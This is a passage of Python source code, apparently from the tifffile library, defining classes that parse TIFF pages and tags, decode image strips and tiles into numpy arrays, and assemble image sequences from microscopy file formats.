return iter(self.pages)
def __str__(self):
"""Return string containing information about file."""
result = [
self._fh.name.capitalize(),
format_size(self._fh.size),
{'<': 'little endian', '>': 'big endian'}[self.byteorder]]
if self.is_bigtiff:
result.append("bigtiff")
if len(self.pages) > 1:
result.append("%i pages" % len(self.pages))
if len(self.series) > 1:
result.append("%i series" % len(self.series))
if len(self._files) > 1:
result.append("%i files" % (len(self._files)))
return ", ".join(result)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
@lazyattr
def fstat(self):
try:
return os.fstat(self._fh.fileno())
except Exception: # io.UnsupportedOperation
return None
@lazyattr
def is_bigtiff(self):
return self.offset_size != 4
@lazyattr
def is_rgb(self):
return all(p.is_rgb for p in self.pages)
@lazyattr
def is_palette(self):
return all(p.is_palette for p in self.pages)
@lazyattr
def is_mdgel(self):
return any(p.is_mdgel for p in self.pages)
@lazyattr
def is_mediacy(self):
return any(p.is_mediacy for p in self.pages)
@lazyattr
def is_stk(self):
return all(p.is_stk for p in self.pages)
@lazyattr
def is_lsm(self):
return self.pages[0].is_lsm
@lazyattr
def is_imagej(self):
return self.pages[0].is_imagej
@lazyattr
def is_micromanager(self):
return self.pages[0].is_micromanager
@lazyattr
def is_nih(self):
return self.pages[0].is_nih
@lazyattr
def is_fluoview(self):
return self.pages[0].is_fluoview
@lazyattr
def is_ome(self):
return self.pages[0].is_ome
class TiffPage(object):
"""A TIFF image file directory (IFD).
Attributes
----------
index : int
Index of page in file.
dtype : str {TIFF_SAMPLE_DTYPES}
Data type of image, colormapped if applicable.
shape : tuple
Dimensions of the image array in TIFF page,
colormapped and with one alpha channel if applicable.
axes : str
Axes label codes:
'X' width, 'Y' height, 'S' sample, 'I' image series|page|plane,
'Z' depth, 'C' color|em-wavelength|channel, 'E' ex-wavelength|lambda,
'T' time, 'R' region|tile, 'A' angle, 'P' phase, 'H' lifetime,
'L' exposure, 'V' event, 'Q' unknown, '_' missing
tags : TiffTags
Dictionary of tags in page.
Tag values are also directly accessible as attributes.
color_map : numpy array
Color look up table, if exists.
cz_lsm_scan_info: Record(dict)
LSM scan info attributes, if exists.
imagej_tags: Record(dict)
Consolidated ImageJ description and metadata tags, if exists.
uic_tags: Record(dict)
Consolidated MetaMorph STK/UIC tags, if exists.
All attributes are read-only.
Notes
-----
The internal, normalized '_shape' attribute is 6 dimensional:
0. number planes (stk)
1. planar samples_per_pixel
2. image_depth Z (sgi)
3. image_length Y
4. image_width X
5. contig samples_per_pixel
"""
def __init__(self, parent):
"""Initialize instance from file."""
self.parent = parent
self.index = len(parent.pages)
self.shape = self._shape = ()
self.dtype = self._dtype = None
self.axes = ""
self.tags = TiffTags()
self._fromfile()
self._process_tags()
def _fromfile(self):
"""Read TIFF IFD structure and its tags from file.
File cursor must be at storage position of IFD offset and is left at
offset to next IFD.
Raises StopIteration if offset (first bytes read) is 0.
"""
fh = self.parent.filehandle
byteorder = self.parent.byteorder
offset_size = self.parent.offset_size
fmt = {4: 'I', 8: 'Q'}[offset_size]
offset = struct.unpack(byteorder + fmt, fh.read(offset_size))[0]
if not offset:
raise StopIteration()
# read standard tags
tags = self.tags
fh.seek(offset)
fmt, size = {4: ('H', 2), 8: ('Q', 8)}[offset_size]
try:
numtags = struct.unpack(byteorder + fmt, fh.read(size))[0]
except Exception:
warnings.warn("corrupted page list")
raise StopIteration()
tagcode = 0
for _ in range(numtags):
try:
tag = TiffTag(self.parent)
# print(tag)
except TiffTag.Error as e:
warnings.warn(str(e))
continue
if tagcode > tag.code:
# expected for early LSM and tifffile versions
warnings.warn("tags are not ordered by code")
tagcode = tag.code
if tag.name not in tags:
tags[tag.name] = tag
else:
                # some files contain multiple tags with the same code,
                # e.g. MicroManager files contain two image_description tags
i = 1
while True:
name = "%s_%i" % (tag.name, i)
if name not in tags:
tags[name] = tag
break
pos = fh.tell()
if self.is_lsm or (self.index and self.parent.is_lsm):
# correct non standard LSM bitspersample tags
self.tags['bits_per_sample']._correct_lsm_bitspersample(self)
if self.is_lsm:
# read LSM info subrecords
for name, reader in CZ_LSM_INFO_READERS.items():
try:
offset = self.cz_lsm_info['offset_'+name]
except KeyError:
continue
if offset < 8:
# older LSM revision
continue
fh.seek(offset)
try:
setattr(self, 'cz_lsm_'+name, reader(fh))
except ValueError:
pass
elif self.is_stk and 'uic1tag' in tags and not tags['uic1tag'].value:
# read uic1tag now that plane count is known
uic1tag = tags['uic1tag']
fh.seek(uic1tag.value_offset)
tags['uic1tag'].value = Record(
read_uic1tag(fh, byteorder, uic1tag.dtype, uic1tag.count,
tags['uic2tag'].count))
fh.seek(pos)
def _process_tags(self):
"""Validate standard tags and initialize attributes.
Raise ValueError if tag values are not supported.
"""
tags = self.tags
for code, (name, default, dtype, count, validate) in TIFF_TAGS.items():
if not (name in tags or default is None):
tags[name] = TiffTag(code, dtype=dtype, count=count,
value=default, name=name)
if name in tags and validate:
try:
if tags[name].count == 1:
setattr(self, name, validate[tags[name].value])
else:
setattr(self, name, tuple(
validate[value] for value in tags[name].value))
except KeyError:
raise ValueError("%s.value (%s) not supported" %
(name, tags[name].value))
tag = tags['bits_per_sample']
if tag.count == 1:
self.bits_per_sample = tag.value
else:
# LSM might list more items than samples_per_pixel
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.bits_per_sample = value
else:
self.bits_per_sample = value[0]
tag = tags['sample_format']
if tag.count == 1:
self.sample_format = TIFF_SAMPLE_FORMATS[tag.value]
else:
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.sample_format = [TIFF_SAMPLE_FORMATS[v] for v in value]
else:
self.sample_format = TIFF_SAMPLE_FORMATS[value[0]]
if 'photometric' not in tags:
self.photometric = None
if 'image_depth' not in tags:
self.image_depth = 1
if 'image_length' in tags:
self.strips_per_image = int(math.floor(
float(self.image_length + self.rows_per_strip - 1) /
self.rows_per_strip))
else:
self.strips_per_image = 0
key = (self.sample_format, self.bits_per_sample)
self.dtype = self._dtype = TIFF_SAMPLE_DTYPES.get(key, None)
if 'image_length' not in self.tags or 'image_width' not in self.tags:
# some GEL file pages are missing image data
self.image_length = 0
self.image_width = 0
self.image_depth = 0
self.strip_offsets = 0
self._shape = ()
self.shape = ()
self.axes = ''
if self.is_palette:
self.dtype = self.tags['color_map'].dtype[1]
self.color_map = numpy.array(self.color_map, self.dtype)
dmax = self.color_map.max()
if dmax < 256:
self.dtype = numpy.uint8
self.color_map = self.color_map.astype(self.dtype)
#else:
# self.dtype = numpy.uint8
# self.color_map >>= 8
# self.color_map = self.color_map.astype(self.dtype)
self.color_map.shape = (3, -1)
# determine shape of data
image_length = self.image_length
image_width = self.image_width
image_depth = self.image_depth
samples_per_pixel = self.samples_per_pixel
if self.is_stk:
assert self.image_depth == 1
planes = self.tags['uic2tag'].count
if self.is_contig:
self._shape = (planes, 1, 1, image_length, image_width,
samples_per_pixel)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, image_length, image_width,
samples_per_pixel)
self.axes = 'YXS'
else:
self._shape = (planes, samples_per_pixel, 1, image_length,
image_width, 1)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, samples_per_pixel, image_length,
image_width)
self.axes = 'SYX'
# detect type of series
if planes == 1:
self.shape = self.shape[1:]
elif numpy.all(self.uic2tag.z_distance != 0):
self.axes = 'Z' + self.axes
elif numpy.all(numpy.diff(self.uic2tag.time_created) != 0):
self.axes = 'T' + self.axes
else:
self.axes = 'I' + self.axes
# DISABLED
if self.is_palette:
assert False, "color mapping disabled for stk"
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, planes, image_length, image_width)
else:
self.shape = (3, planes, image_depth, image_length,
image_width)
self.axes = 'C' + self.axes
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
elif self.is_palette:
samples = 1
if 'extra_samples' in self.tags:
samples += len(self.extra_samples)
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples)
else:
self._shape = (1, samples, image_depth, image_length,
image_width, 1)
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, image_length, image_width)
self.axes = 'CYX'
else:
self.shape = (3, image_depth, image_length, image_width)
self.axes = 'CZYX'
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
elif self.is_rgb or samples_per_pixel > 1:
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples_per_pixel)
if image_depth == 1:
self.shape = (image_length, image_width, samples_per_pixel)
self.axes = 'YXS'
else:
self.shape = (image_depth, image_length, image_width,
samples_per_pixel)
self.axes = 'ZYXS'
else:
self._shape = (1, samples_per_pixel, image_depth,
image_length, image_width, 1)
if image_depth == 1:
self.shape = (samples_per_pixel, image_length, image_width)
self.axes = 'SYX'
else:
self.shape = (samples_per_pixel, image_depth,
image_length, image_width)
self.axes = 'SZYX'
if False and self.is_rgb and 'extra_samples' in self.tags:
# DISABLED: only use RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for exs in extra_samples:
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
self.shape = self.shape[:-1] + (4,)
else:
self.shape = (4,) + self.shape[1:]
break
else:
self._shape = (1, 1, image_depth, image_length, image_width, 1)
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
if not self.compression and 'strip_byte_counts' not in tags:
self.strip_byte_counts = (
product(self.shape) * (self.bits_per_sample // 8), )
assert len(self.shape) == len(self.axes)
def asarray(self, squeeze=True, colormapped=True, rgbonly=False,
scale_mdgel=False, memmap=False, reopen=True):
"""Read image data from file and return as numpy array.
Raise ValueError if format is unsupported.
If any of 'squeeze', 'colormapped', or 'rgbonly' are not the default,
the shape of the returned array might be different from the page shape.
Parameters
----------
squeeze : bool
If True, all length-1 dimensions (except X and Y) are
squeezed out from result.
colormapped : bool
If True, color mapping is applied for palette-indexed images.
rgbonly : bool
If True, return RGB(A) image without additional extra samples.
memmap : bool
If True, use numpy.memmap to read arrays from file if possible.
Intended for 64-bit systems and files with large contiguous blocks of data.
reopen : bool
If True and the parent file handle is closed, the file is
temporarily re-opened (and closed if no exception occurs).
scale_mdgel : bool
If True, MD Gel data will be scaled according to the private
metadata in the second TIFF page. The dtype will be float32.
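Examples
--------
A hedged usage sketch (assuming a file 'test.tif' exists):
>>> with TiffFile('test.tif') as tif:  # doctest: +SKIP
...     image = tif[0].asarray()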
"""
if not self._shape:
return
if self.dtype is None:
raise ValueError("data type not supported: %s%i" % (
self.sample_format, self.bits_per_sample))
if self.compression not in TIFF_DECOMPESSORS:
raise ValueError("cannot decompress %s" % self.compression)
tag = self.tags['sample_format']
if tag.count != 1 and any((i-tag.value[0] for i in tag.value)):
raise ValueError("sample formats don't match %s" % str(tag.value))
fh = self.parent.filehandle
closed = fh.closed
if closed:
if reopen:
fh.open()
else:
raise IOError("file handle is closed")
dtype = self._dtype
shape = self._shape
image_width = self.image_width
image_length = self.image_length
image_depth = self.image_depth
typecode = self.parent.byteorder + dtype
bits_per_sample = self.bits_per_sample
if self.is_tiled:
if 'tile_offsets' in self.tags:
byte_counts = self.tile_byte_counts
offsets = self.tile_offsets
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
tile_width = self.tile_width
tile_length = self.tile_length
tile_depth = self.tile_depth if 'tile_depth' in self.tags else 1
tw = (image_width + tile_width - 1) // tile_width
tl = (image_length + tile_length - 1) // tile_length
td = (image_depth + tile_depth - 1) // tile_depth
shape = (shape[0], shape[1],
td*tile_depth, tl*tile_length, tw*tile_width, shape[-1])
tile_shape = (tile_depth, tile_length, tile_width, shape[-1])
runlen = tile_width
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
runlen = image_width
if any(o < 2 for o in offsets):
raise ValueError("corrupted page")
if memmap and self._is_memmappable(rgbonly, colormapped):
result = fh.memmap_array(typecode, shape, offset=offsets[0])
elif self.is_contiguous:
fh.seek(offsets[0])
result = fh.read_array(typecode, product(shape))
result = result.astype('=' + dtype)
else:
if self.is_contig:
runlen *= self.samples_per_pixel
if bits_per_sample in (8, 16, 32, 64, 128):
if (bits_per_sample * runlen) % 8:
raise ValueError("data and sample size mismatch")
def unpack(x):
try:
return numpy.fromstring(x, typecode)
except ValueError as e:
# strips may be missing EOI
warnings.warn("unpack: %s" % e)
xlen = ((len(x) // (bits_per_sample // 8))
* (bits_per_sample // 8))
return numpy.fromstring(x[:xlen], typecode)
elif isinstance(bits_per_sample, tuple):
def unpack(x):
return unpackrgb(x, typecode, bits_per_sample)
else:
def unpack(x):
return unpackints(x, typecode, bits_per_sample, runlen)
decompress = TIFF_DECOMPESSORS[self.compression]
if self.compression == 'jpeg':
table = self.jpeg_tables if 'jpeg_tables' in self.tags else b''
decompress = lambda x: decodejpg(x, table, self.photometric)
if self.is_tiled:
result = numpy.empty(shape, dtype)
tw, tl, td, pl = 0, 0, 0, 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
tile = unpack(decompress(fh.read(bytecount)))
tile.shape = tile_shape
if self.predictor == 'horizontal':
numpy.cumsum(tile, axis=-2, dtype=dtype, out=tile)
result[0, pl, td:td+tile_depth,
tl:tl+tile_length, tw:tw+tile_width, :] = tile
del tile
tw += tile_width
if tw >= shape[4]:
tw, tl = 0, tl + tile_length
if tl >= shape[3]:
tl, td = 0, td + tile_depth
if td >= shape[2]:
td, pl = 0, pl + 1
result = result[...,
:image_depth, :image_length, :image_width, :]
else:
strip_size = (self.rows_per_strip * self.image_width *
self.samples_per_pixel)
result = numpy.empty(shape, dtype).reshape(-1)
index = 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
strip = fh.read(bytecount)
strip = decompress(strip)
strip = unpack(strip)
size = min(result.size, strip.size, strip_size,
result.size - index)
result[index:index+size] = strip[:size]
del strip
index += size
result.shape = self._shape
if self.predictor == 'horizontal' and not (self.is_tiled and not
self.is_contiguous):
# work around bug in LSM510 software
if not (self.parent.is_lsm and not self.compression):
numpy.cumsum(result, axis=-2, dtype=dtype, out=result)
if colormapped and self.is_palette:
if self.color_map.shape[1] >= 2**bits_per_sample:
# FluoView and LSM might fail here
result = numpy.take(self.color_map,
result[:, 0, :, :, :, 0], axis=1)
elif rgbonly and self.is_rgb and 'extra_samples' in self.tags:
# return only RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for i, exs in enumerate(extra_samples):
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
result = result[..., [0, 1, 2, 3+i]]
else:
result = result[:, [0, 1, 2, 3+i]]
break
else:
if self.is_contig:
result = result[..., :3]
else:
result = result[:, :3]
if squeeze:
try:
result.shape = self.shape
except ValueError:
warnings.warn("failed to reshape from %s to %s" % (
str(result.shape), str(self.shape)))
if scale_mdgel and self.parent.is_mdgel:
# MD Gel stores private metadata in the second page
tags = self.parent.pages[1]
if tags.md_file_tag in (2, 128):
scale = tags.md_scale_pixel
scale = scale[0] / scale[1] # rational
result = result.astype('float32')
if tags.md_file_tag == 2:
result **= 2  # square root data format
result *= scale
if closed:
# TODO: file remains open if an exception occurred above
fh.close()
return result
def _is_memmappable(self, rgbonly, colormapped):
"""Return if image data in file can be memory mapped."""
if not self.parent.filehandle.is_file or not self.is_contiguous:
return False
return not (self.predictor or
(rgbonly and 'extra_samples' in self.tags) or
(colormapped and self.is_palette) or
({'big': '>', 'little': '<'}[sys.byteorder] !=
self.parent.byteorder))
@lazyattr
def is_contiguous(self):
"""Return offset and size of contiguous data, else None.
Excludes prediction and colormapping.
"""
if self.compression or self.bits_per_sample not in (8, 16, 32, 64):
return
if self.is_tiled:
if (self.image_width != self.tile_width or
self.image_length % self.tile_length or
self.tile_width % 16 or self.tile_length % 16):
return
if ('image_depth' in self.tags and 'tile_depth' in self.tags and
(self.image_length != self.tile_length or
self.image_depth % self.tile_depth)):
return
offsets = self.tile_offsets
byte_counts = self.tile_byte_counts
else:
offsets = self.strip_offsets
byte_counts = self.strip_byte_counts
if len(offsets) == 1:
return offsets[0], byte_counts[0]
if self.is_stk or all(offsets[i] + byte_counts[i] == offsets[i+1]
or byte_counts[i+1] == 0 # no data/ignore offset
for i in range(len(offsets)-1)):
return offsets[0], sum(byte_counts)
def __str__(self):
"""Return string containing information about page."""
s = ', '.join(s for s in (
' x '.join(str(i) for i in self.shape),
str(numpy.dtype(self.dtype)),
'%s bit' % str(self.bits_per_sample),
self.photometric if 'photometric' in self.tags else '',
self.compression if self.compression else 'raw',
'|'.join(t[3:] for t in (
'is_stk', 'is_lsm', 'is_nih', 'is_ome', 'is_imagej',
'is_micromanager', 'is_fluoview', 'is_mdgel', 'is_mediacy',
'is_sgi', 'is_reduced', 'is_tiled',
'is_contiguous') if getattr(self, t))) if s)
return "Page %i: %s" % (self.index, s)
def __getattr__(self, name):
"""Return tag value."""
if name in self.tags:
value = self.tags[name].value
setattr(self, name, value)
return value
raise AttributeError(name)
@lazyattr
def uic_tags(self):
"""Consolidate UIC tags."""
if not self.is_stk:
raise AttributeError("uic_tags")
tags = self.tags
result = Record()
result.number_planes = tags['uic2tag'].count
if 'image_description' in tags:
result.plane_descriptions = self.image_description.split(b'\x00')
if 'uic1tag' in tags:
result.update(tags['uic1tag'].value)
if 'uic3tag' in tags:
result.update(tags['uic3tag'].value) # wavelengths
if 'uic4tag' in tags:
result.update(tags['uic4tag'].value) # override uic1 tags
uic2tag = tags['uic2tag'].value
result.z_distance = uic2tag.z_distance
result.time_created = uic2tag.time_created
result.time_modified = uic2tag.time_modified
try:
result.datetime_created = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_created, uic2tag.time_created)]
result.datetime_modified = [
julian_datetime(*dt) for dt in
zip(uic2tag.date_modified, uic2tag.time_modified)]
except ValueError as e:
warnings.warn("uic_tags: %s" % e)
return result
@lazyattr
def imagej_tags(self):
"""Consolidate ImageJ metadata."""
if not self.is_imagej:
raise AttributeError("imagej_tags")
tags = self.tags
if 'image_description_1' in tags:
# MicroManager
result = imagej_description(tags['image_description_1'].value)
else:
result = imagej_description(tags['image_description'].value)
if 'imagej_metadata' in tags:
try:
result.update(imagej_metadata(
tags['imagej_metadata'].value,
tags['imagej_byte_counts'].value,
self.parent.byteorder))
except Exception as e:
warnings.warn(str(e))
return Record(result)
@lazyattr
def is_rgb(self):
"""True if page contains a RGB image."""
return ('photometric' in self.tags and
self.tags['photometric'].value == 2)
@lazyattr
def is_contig(self):
"""True if page contains a contiguous image."""
return ('planar_configuration' in self.tags and
self.tags['planar_configuration'].value == 1)
@lazyattr
def is_palette(self):
"""True if page contains a palette-colored image and not OME or STK."""
try:
# turn off color mapping for OME-TIFF and STK
if self.is_stk or self.is_ome or self.parent.is_ome:
return False
except IndexError:
pass # OME-XML not found in first page
return ('photometric' in self.tags and
self.tags['photometric'].value == 3)
@lazyattr
def is_tiled(self):
"""True if page contains tiled image."""
return 'tile_width' in self.tags
@lazyattr
def is_reduced(self):
"""True if page is a reduced image of another image."""
return bool(self.tags['new_subfile_type'].value & 1)
@lazyattr
def is_mdgel(self):
"""True if page contains md_file_tag tag."""
return 'md_file_tag' in self.tags
@lazyattr
def is_mediacy(self):
"""True if page contains Media Cybernetics Id tag."""
return ('mc_id' in self.tags and
self.tags['mc_id'].value.startswith(b'MC TIFF'))
@lazyattr
def is_stk(self):
"""True if page contains UIC2Tag tag."""
return 'uic2tag' in self.tags
@lazyattr
def is_lsm(self):
"""True if page contains LSM CZ_LSM_INFO tag."""
return 'cz_lsm_info' in self.tags
@lazyattr
def is_fluoview(self):
"""True if page contains FluoView MM_STAMP tag."""
return 'mm_stamp' in self.tags
@lazyattr
def is_nih(self):
"""True if page contains NIH image header."""
return 'nih_image_header' in self.tags
@lazyattr
def is_sgi(self):
"""True if page contains SGI image and tile depth tags."""
return 'image_depth' in self.tags and 'tile_depth' in self.tags
@lazyattr
def is_ome(self):
"""True if page contains OME-XML in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'<?xml version='))
@lazyattr
def is_shaped(self):
"""True if page contains shape in image_description tag."""
return ('image_description' in self.tags and self.tags[
'image_description'].value.startswith(b'shape=('))
@lazyattr
def is_imagej(self):
"""True if page contains ImageJ description."""
return (
('image_description' in self.tags and
self.tags['image_description'].value.startswith(b'ImageJ=')) or
('image_description_1' in self.tags and # Micromanager
self.tags['image_description_1'].value.startswith(b'ImageJ=')))
@lazyattr
def is_micromanager(self):
"""True if page contains Micro-Manager metadata."""
return 'micromanager_metadata' in self.tags
class TiffTag(object):
"""A TIFF tag structure.
Attributes
----------
name : string
Attribute name of tag.
code : int
Decimal code of tag.
dtype : str
Datatype of tag data. One of TIFF_DATA_TYPES.
count : int
Number of values.
value : various types
Tag data as Python object.
value_offset : int
Location of value in file, if any.
All attributes are read-only.
"""
__slots__ = ('code', 'name', 'count', 'dtype', 'value', 'value_offset',
'_offset', '_value', '_type')
class Error(Exception):
pass
def __init__(self, arg, **kwargs):
"""Initialize instance from file or arguments."""
self._offset = None
if hasattr(arg, '_fh'):
self._fromfile(arg, **kwargs)
else:
self._fromdata(arg, **kwargs)
def _fromdata(self, code, dtype, count, value, name=None):
"""Initialize instance from arguments."""
self.code = int(code)
self.name = name if name else str(code)
self.dtype = TIFF_DATA_TYPES[dtype]
self.count = int(count)
self.value = value
self._value = value
self._type = dtype
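# Example (hedged sketch): create a tag from arguments instead of a file:
#   TiffTag(256, dtype=3, count=1, value=512, name='image_width')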
def _fromfile(self, parent):
"""Read tag structure from open file. Advance file cursor."""
fh = parent.filehandle
byteorder = parent.byteorder
self._offset = fh.tell()
self.value_offset = self._offset + parent.offset_size + 4
fmt, size = {4: ('HHI4s', 12), 8: ('HHQ8s', 20)}[parent.offset_size]
data = fh.read(size)
code, dtype = struct.unpack(byteorder + fmt[:2], data[:4])
count, value = struct.unpack(byteorder + fmt[2:], data[4:])
self._value = value
self._type = dtype
if code in TIFF_TAGS:
name = TIFF_TAGS[code][0]
elif code in CUSTOM_TAGS:
name = CUSTOM_TAGS[code][0]
else:
name = str(code)
try:
dtype = TIFF_DATA_TYPES[self._type]
except KeyError:
raise TiffTag.Error("unknown tag data type %i" % self._type)
fmt = '%s%i%s' % (byteorder, count*int(dtype[0]), dtype[1])
size = struct.calcsize(fmt)
if size > parent.offset_size or code in CUSTOM_TAGS:
pos = fh.tell()
tof = {4: 'I', 8: 'Q'}[parent.offset_size]
self.value_offset = offset = struct.unpack(byteorder+tof, value)[0]
if offset < 0 or offset > parent.filehandle.size:
raise TiffTag.Error("corrupt file - invalid tag value offset")
elif offset < 4:
raise TiffTag.Error("corrupt value offset for tag %i" % code)
fh.seek(offset)
if code in CUSTOM_TAGS:
readfunc = CUSTOM_TAGS[code][1]
value = readfunc(fh, byteorder, dtype, count)
if isinstance(value, dict): # numpy.core.records.record
value = Record(value)
elif code in TIFF_TAGS or dtype[-1] == 's':
value = struct.unpack(fmt, fh.read(size))
else:
value = read_numpy(fh, byteorder, dtype, count)
fh.seek(pos)
else:
value = struct.unpack(fmt, value[:size])
if code not in CUSTOM_TAGS and code not in (273, 279, 324, 325):
# scalar value if not strip/tile offsets/byte_counts
if len(value) == 1:
value = value[0]
if (dtype.endswith('s') and isinstance(value, bytes)
and self._type != 7):
# TIFF ASCII fields can contain multiple strings,
# each terminated with a NUL
value = stripascii(value)
self.code = code
self.name = name
self.dtype = dtype
self.count = count
self.value = value
def _correct_lsm_bitspersample(self, parent):
"""Correct LSM bitspersample tag.
Old LSM writers may use a separate region for two 16-bit values,
even though they fit into the tag's own value element.
"""
if self.code == 258 and self.count == 2:
# TODO: test this. Need example file.
warnings.warn("correcting LSM bitspersample tag")
fh = parent.filehandle
tof = {4: '<I', 8: '<Q'}[parent.offset_size]
self.value_offset = struct.unpack(tof, self._value)[0]
fh.seek(self.value_offset)
self.value = struct.unpack("<HH", fh.read(4))
def as_str(self):
"""Return value as human readable string."""
return ((str(self.value).split('\n', 1)[0]) if (self._type != 7)
else '<undefined>')
def __str__(self):
"""Return string containing information about tag."""
return ' '.join(str(getattr(self, s)) for s in self.__slots__)
class TiffSequence(object):
"""Sequence of image files.
The data shape and dtype of all files must match.
Properties
----------
files : list
List of file names.
shape : tuple
Shape of image sequence.
axes : str
Labels of axes in shape.
Examples
--------
>>> tifs = TiffSequence("test.oif.files/*.tif") # doctest: +SKIP
>>> tifs.shape, tifs.axes # doctest: +SKIP
((2, 100), 'CT')
>>> data = tifs.asarray() # doctest: +SKIP
>>> data.shape # doctest: +SKIP
(2, 100, 256, 256)
"""
_patterns = {
'axes': r"""
# matches Olympus OIF and Leica TIFF series
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
_?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))?
"""}
class ParseError(Exception):
pass
def __init__(self, files, imread=TiffFile, pattern='axes',
*args, **kwargs):
"""Initialize instance from multiple files.
Parameters
----------
files : str, or sequence of str
Glob pattern or sequence of file names.
imread : function or class
Image read function or class with asarray function returning numpy
array from single file.
pattern : str
Regular expression pattern that matches axes names and sequence
indices in file names.
By default this matches Olympus OIF and Leica TIFF series.
"""
if isinstance(files, basestring):
files = natural_sorted(glob.glob(files))
files = list(files)
if not files:
raise ValueError("no files found")
#if not os.path.isfile(files[0]):
# raise ValueError("file not found")
self.files = files
if hasattr(imread, 'asarray'):
# redefine imread
_imread = imread
def imread(fname, *args, **kwargs):
with _imread(fname) as im:
return im.asarray(*args, **kwargs)
self.imread = imread
self.pattern = self._patterns.get(pattern, pattern)
try:
self._parse()
if not self.axes:
self.axes = 'I'
except self.ParseError:
self.axes = 'I'
self.shape = (len(files),)
self._start_index = (0,)
self._indices = tuple((i,) for i in range(len(files)))
def __str__(self):
"""Return string with information about image sequence."""
return "\n".join([
self.files[0],
'* files: %i' % len(self.files),
'* axes: %s' % self.axes,
'* shape: %s' % str(self.shape)])
def __len__(self):
return len(self.files)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
pass
def asarray(self, memmap=False, *args, **kwargs):
"""Read image data from all files and return as single numpy array.
If memmap is True, return an array stored in a binary file on disk.
The args and kwargs parameters are passed to the imread function.
Raise IndexError or ValueError if image shapes don't match.
"""
im = self.imread(self.files[0], *args, **kwargs)
shape = self.shape + im.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=im.dtype, shape=shape)
else:
result = numpy.zeros(shape, dtype=im.dtype)
result = result.reshape(-1, *im.shape)
for index, fname in zip(self._indices, self.files):
index = [i-j for i, j in zip(index, self._start_index)]
index = numpy.ravel_multi_index(index, self.shape)
im = self.imread(fname, *args, **kwargs)
result[index] = im
result.shape = shape
return result
def _parse(self):
"""Get axes and shape from file names."""
if not self.pattern:
raise self.ParseError("invalid pattern")
pattern = re.compile(self.pattern, re.IGNORECASE | re.VERBOSE)
matches = pattern.findall(self.files[0])
if not matches:
raise self.ParseError("pattern doesn't match file names")
matches = matches[-1]
if len(matches) % 2:
raise self.ParseError("pattern doesn't match axis name and index")
axes = ''.join(m for m in matches[::2] if m)
if not axes:
raise self.ParseError("pattern doesn't match file names")
indices = []
for fname in self.files:
matches = pattern.findall(fname)[-1]
if axes != ''.join(m for m in matches[::2] if m):
raise ValueError("axes don't match within the image sequence")
indices.append([int(m) for m in matches[1::2] if m])
shape = tuple(numpy.max(indices, axis=0))
start_index = tuple(numpy.min(indices, axis=0))
shape = tuple(i-j+1 for i, j in zip(shape, start_index))
if product(shape) != len(self.files):
warnings.warn("files are missing. Missing data are zeroed")
self.axes = axes.upper()
self.shape = shape
self._indices = indices
self._start_index = start_index
class Record(dict):
"""Dictionary with attribute access.
Can also be initialized with numpy.core.records.record.
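Examples
--------
>>> r = Record({'width': 256})
>>> r.width
256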
"""
__slots__ = ()
def __init__(self, arg=None, **kwargs):
if kwargs:
arg = kwargs
elif arg is None:
arg = {}
try:
dict.__init__(self, arg)
except (TypeError, ValueError):
for i, name in enumerate(arg.dtype.names):
v = arg[i]
self[name] = v if v.dtype.char != 'S' else stripnull(v)
def __getattr__(self, name):
return self[name]
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __str__(self):
"""Pretty print Record."""
s = []
lists = []
for k in sorted(self):
try:
if k.startswith('_'):  # startswith fails on non-string keys
continue
except AttributeError:
pass
v = self[k]
if isinstance(v, (list, tuple)) and len(v):
if isinstance(v[0], Record):
lists.append((k, v))
continue
elif isinstance(v[0], TiffPage):
v = [i.index for i in v if i]
s.append(
("* %s: %s" % (k, str(v))).split("\n", 1)[0]
[:PRINT_LINE_LEN].rstrip())
for k, v in lists:
l = []
for i, w in enumerate(v):
l.append("* %s[%i]\n %s" % (k, i,
str(w).replace("\n", "\n ")))
s.append('\n'.join(l))
return '\n'.join(s)
class TiffTags(Record):
"""Dictionary of TiffTag with attribute access."""
def __str__(self):
"""Return string with information about all tags."""
s = []
